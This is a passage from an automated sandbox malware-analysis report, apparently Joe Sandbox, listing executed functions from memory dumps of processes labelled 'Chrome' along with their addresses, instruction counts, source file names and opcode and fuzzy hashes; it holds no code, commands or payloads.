                                                                                                                    Function 00007FF7C1440CB9 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 105cb8a67f38d354f4aed6091bc9a38f6476775e20226f73383828ee870cd661
                                                                                                                    • Instruction ID: c863f3f20b9bd1b3c13ce4c60b35dd7f937376fca388959b6753f08972653b54
                                                                                                                    • Opcode Fuzzy Hash: 105cb8a67f38d354f4aed6091bc9a38f6476775e20226f73383828ee870cd661
                                                                                                                    • Instruction Fuzzy Hash: 8E31B271F18A094FE784BBBC58193BDB7D1EF99762F4442BAE00DC3282DD68A9018791
                                                                                                                    Function 00007FF7C14421F1 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6777895f985c0530c4f45dec050264d2dc425523dbdeaabd0ba6a798ddb157c1
                                                                                                                    • Instruction ID: d5b385e3fb696e9972598f3da7529e70d0d1aac66b80544ce13f9ac383a1c035
                                                                                                                    • Opcode Fuzzy Hash: 6777895f985c0530c4f45dec050264d2dc425523dbdeaabd0ba6a798ddb157c1
                                                                                                                    • Instruction Fuzzy Hash: 77012B5190D7C10FE7567B386C65835BFE09F91260B4805BEE885C71EBD848AA448352

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C14216A9 Relevance: .8, Instructions: 769COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a61919690200872721c7517ec0116fc7a29e299aa55c55d18201a38551bff183
                                                                                                                    • Instruction ID: 602bc0fc04268b5fbdaf176697a79344d97d16e1488b60f9cfc9a8c8295709a4
                                                                                                                    • Opcode Fuzzy Hash: a61919690200872721c7517ec0116fc7a29e299aa55c55d18201a38551bff183
                                                                                                                    • Instruction Fuzzy Hash: A832A130B28A098FE794FB2898597B9F7D2FF99751F8445B9D00EC33C2DE68A8418741
                                                                                                                    Function 00007FF7C1422029 Relevance: .2, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 990e53746cdbf500f24884498e1d483c3089f430f933272b219b1bc11037fd59
                                                                                                                    • Instruction ID: b80aa672a1fb69d011ace22a30e3aa3ddc450c70af1c90ccc6e112e2640a1130
                                                                                                                    • Opcode Fuzzy Hash: 990e53746cdbf500f24884498e1d483c3089f430f933272b219b1bc11037fd59
                                                                                                                    • Instruction Fuzzy Hash: 04512460A1DAC94FD796AB385864676BFE1EF47225B0801FBE0CDC7193DD4C584AC352
                                                                                                                    Function 00007FF7C1421258 Relevance: .5, Instructions: 472COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82f7817d577e7a97bd46454436ffcfca1011c2a6bccbc1ed000bfb5351eb0cbe
                                                                                                                    • Instruction ID: 3e794f6c6e4f7c353a0565dae91ef1618949ea4c5dfa9a0ee34456b5b7f1a397
                                                                                                                    • Opcode Fuzzy Hash: 82f7817d577e7a97bd46454436ffcfca1011c2a6bccbc1ed000bfb5351eb0cbe
                                                                                                                    • Instruction Fuzzy Hash: 0721D77090864A8FD709AB38C8652EAFFB2FF49345F4541BAC00AD72D3CE3478158790
                                                                                                                    Function 00007FF7C1420B2F Relevance: .2, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099baab17b6a506a9027fdf0575e2e3ca8ba3cd356f15f7d01fc2701db5ab9fc
                                                                                                                    • Instruction ID: 8b63f008862b3e11e2ce8b18e32e2b28f1cc6c290bcfe456b1ceb5c0d3a05d8a
                                                                                                                    • Opcode Fuzzy Hash: 099baab17b6a506a9027fdf0575e2e3ca8ba3cd356f15f7d01fc2701db5ab9fc
                                                                                                                    • Instruction Fuzzy Hash: 2441F775F08A1A9FDB44FB68D8556EDB7E1FF88362F90457AD009C7382CE34A8468790
                                                                                                                    Function 00007FF7C1420E69 Relevance: .2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 988127d8de3db9930fe7d255bbaadd45ed93d8db205e2ea7ff2151a1d40529d2
                                                                                                                    • Instruction ID: aab8f4954c15f074aad6721df1fcd15275191bfc35639af2b1281b3c618d05f6
                                                                                                                    • Opcode Fuzzy Hash: 988127d8de3db9930fe7d255bbaadd45ed93d8db205e2ea7ff2151a1d40529d2
                                                                                                                    • Instruction Fuzzy Hash: F0412631B1CA4A0FE755BB3CA8562B977D2EF89331B4901BAD44DC7293DD58BC828741
                                                                                                                    Function 00007FF7C1420620 Relevance: .1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6172d8a9849feb86a986d69806e78d3b56130c217f8d14a68ae9d9d7e6a0f9e0
                                                                                                                    • Instruction ID: 9d1a99c7b5aaffadff97e688d769760718c8e50c2ef5db0150e5045994f424a2
                                                                                                                    • Opcode Fuzzy Hash: 6172d8a9849feb86a986d69806e78d3b56130c217f8d14a68ae9d9d7e6a0f9e0
                                                                                                                    • Instruction Fuzzy Hash: 0B31C661B1C9494FE798EB2C9859779B7D2EF9C361F4406BEE00EC3293DD68AC468341
                                                                                                                    Function 00007FF7C1420CB9 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
                                                                                                                    • Instruction ID: a6286c4f606e7bfa57f3d8358882a98a9f72955f4c4268bef0f0939fc515f657
                                                                                                                    • Opcode Fuzzy Hash: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
                                                                                                                    • Instruction Fuzzy Hash: 4231E671F189094FE744BBBD98193BDB7D1EF99762F4402BAE00EC3283DD28A8418791
                                                                                                                    Function 00007FF7C14221F1 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 447e14b5853b45411076cf52adfa4f577d581ecb926ca172f94032131bae4f4e
                                                                                                                    • Instruction ID: 8279111bc04bc3287c3f27df40e7e9344210a550b011c2827fa2a74b623d0727
                                                                                                                    • Opcode Fuzzy Hash: 447e14b5853b45411076cf52adfa4f577d581ecb926ca172f94032131bae4f4e
                                                                                                                    • Instruction Fuzzy Hash: 28012B5190D6C10FE355BB385C65535BFE08FA2320B4C05FEE885C71E7DC489A848362

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C14216A9 Relevance: .8, Instructions: 769COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 216d90848ceb36bb09c6708973415515466df9bfbfdf8dda2a03866afd599ac1
                                                                                                                    • Instruction ID: 154d53f023bb1f811ccfb0d3101ea199a80aab149f39c7abe0e2cd3d769999d3
                                                                                                                    • Opcode Fuzzy Hash: 216d90848ceb36bb09c6708973415515466df9bfbfdf8dda2a03866afd599ac1
                                                                                                                    • Instruction Fuzzy Hash: 48329330B28A498FE794FB3888597B9B7D2FF89755F8445B9D00EC33C2DE68A9418741
                                                                                                                    Function 00007FF7C1422029 Relevance: .2, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1d4bf41de7fbb9067c9aea6df20390b646cefac15cd07158ea00f46c6fa6a9d0
                                                                                                                    • Instruction ID: ec74bc62d6a5aaa2beab6ec0e0e80d560349e335d2d92b565ba110aaa2f19714
                                                                                                                    • Opcode Fuzzy Hash: 1d4bf41de7fbb9067c9aea6df20390b646cefac15cd07158ea00f46c6fa6a9d0
                                                                                                                    • Instruction Fuzzy Hash: 2F512460A1DAC94FD796AB384864676BFE1EF47225B0801FBE0CDC7193DD4C584AC352
                                                                                                                    Function 00007FF7C1421258 Relevance: .5, Instructions: 472COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 876c6b594e746715a67f9535d4ad7f157c7bce0df2331f8dea8494fbfc00bf72
                                                                                                                    • Instruction ID: 0f1525a0917f5be6027a09a7d17e2ae9f80fdab489b72cb5b366f9e0cb07b8c6
                                                                                                                    • Opcode Fuzzy Hash: 876c6b594e746715a67f9535d4ad7f157c7bce0df2331f8dea8494fbfc00bf72
                                                                                                                    • Instruction Fuzzy Hash: 1D21C57090868A8FD709EB39C8652EAFBB2FF49245F4541FAC00AD72D3CE7468158790
                                                                                                                    Function 00007FF7C1420B2F Relevance: .2, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9de6e77f31ee3a0acd7aa175f5345e78bee0065513a76bdc69eb67479c4dbb13
                                                                                                                    • Instruction ID: d6718f20c461043525eefa332605463d53cd8a1da5842fa6a0ad2f36d2626d6d
                                                                                                                    • Opcode Fuzzy Hash: 9de6e77f31ee3a0acd7aa175f5345e78bee0065513a76bdc69eb67479c4dbb13
                                                                                                                    • Instruction Fuzzy Hash: 2841E635B18A1D9FDB44FB68D8556EDB7E1FF88352F5041BAD009C7382CE34A8468790
                                                                                                                    Function 00007FF7C1420E69 Relevance: .2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ec1b8245b22f506890b48778d2e21204676b949a31db1c72f7d39340f1b2600
                                                                                                                    • Instruction ID: 9000aa2f234ff6d677379d83e9bd37fca3b675ef259be7eaa96c7cbeff521427
                                                                                                                    • Opcode Fuzzy Hash: 4ec1b8245b22f506890b48778d2e21204676b949a31db1c72f7d39340f1b2600
                                                                                                                    • Instruction Fuzzy Hash: FF410431B1CA4A0FE755BB38A8562B977D2EF89321B4941FAD44DC7293DD58BC828341
                                                                                                                    Function 00007FF7C1420620 Relevance: .1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 63ab73d8e8326640cad96b1f98b884982936d3479f0ec89b94f1e3406baa1e25
                                                                                                                    • Instruction ID: 8b4f1bdfd4c1d4167170619c35cc6790533510ccf5a7f455c7c21dae6f102eb5
                                                                                                                    • Opcode Fuzzy Hash: 63ab73d8e8326640cad96b1f98b884982936d3479f0ec89b94f1e3406baa1e25
                                                                                                                    • Instruction Fuzzy Hash: 3931B561B1C9494FE798EB2C9859779B7D2EF98361F4406BEE00EC3293DD68AC468341
                                                                                                                    Function 00007FF7C1420CB9 Relevance: .1, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
                                                                                                                    • Instruction ID: a6286c4f606e7bfa57f3d8358882a98a9f72955f4c4268bef0f0939fc515f657
                                                                                                                    • Opcode Fuzzy Hash: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
                                                                                                                    • Instruction Fuzzy Hash: 4231E671F189094FE744BBBD98193BDB7D1EF99762F4402BAE00EC3283DD28A8418791
                                                                                                                    Function 00007FF7C14221F1 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a0f60361c9499600ab1e2a1c00d644d14d0a7581e93d8a6285e55e8d52b7bb4
                                                                                                                    • Instruction ID: 1a1810bf6943ee949c683729d0214ad915ed3843944071389fd9f058469d561b
                                                                                                                    • Opcode Fuzzy Hash: 1a0f60361c9499600ab1e2a1c00d644d14d0a7581e93d8a6285e55e8d52b7bb4
                                                                                                                    • Instruction Fuzzy Hash: 1301261590DAC54FE356BB384C65935BFE08FA2320B4805FAE889C71E7DC49AA848362